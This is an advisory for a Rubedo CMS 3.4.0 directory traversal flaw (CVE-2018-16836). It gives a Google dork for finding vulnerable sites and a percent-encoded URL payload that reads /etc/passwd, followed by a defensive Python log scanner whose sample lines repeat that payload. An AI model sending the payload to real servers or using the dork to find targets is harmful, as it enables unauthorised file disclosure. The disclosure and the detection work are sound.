# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836

# PoC:
# Read /etc/passwd file from remote server

/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
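
Added example (not part of the original advisory or of Rubedo's code): a log check a defender can run to find requests of the shape shown in the PoC, by percent-decoding the request target and testing whether a `/theme/` path resolves outside that prefix. The Common Log Format input, the `THEME_PREFIX` constant, the function names and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

THEME_PREFIX = "/theme/"   # assumption: theme assets are served under this prefix
MAX_DECODE_ROUNDS = 3      # also unwraps nested encodings such as %252e%252e
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2018:10:00:01 +0000] "GET /theme/default/img/logo.png HTTP/1.1" 200 5120',
    '192.0.2.10 - - [11/Sep/2018:10:00:02 +0000] "GET /theme/default/css/../img/logo.png HTTP/1.1" 200 5120',
    '192.0.2.66 - - [11/Sep/2018:10:00:03 +0000] "GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1" 200 1843',
    '192.0.2.66 - - [11/Sep/2018:10:00:04 +0000] "GET /theme/default/img/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0',
]

def fully_decode(path):
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def escapes_theme_root(target):
    """True if a /theme/ request resolves outside /theme/ once decoded."""
    path = target.split("?", 1)[0]          # ignore the query string
    if not path.startswith(THEME_PREFIX):
        return False
    decoded = fully_decode(path).replace("\\", "/")
    resolved = posixpath.normpath(decoded)  # collapses "..", "." and "//"
    return not (resolved + "/").startswith(THEME_PREFIX)

def suspicious_lines(log_lines):
    """Return the log lines whose request target escapes the theme root."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match and escapes_theme_root(match.group(1)):
            hits.append(line)
    return hits

if __name__ == "__main__":
    for line in suspicious_lines(SAMPLE_LOG):
        print(line)
```

A flagged line with a 200 status and a body size unlike the site's theme assets is the one to triage first, since it suggests the file was actually returned.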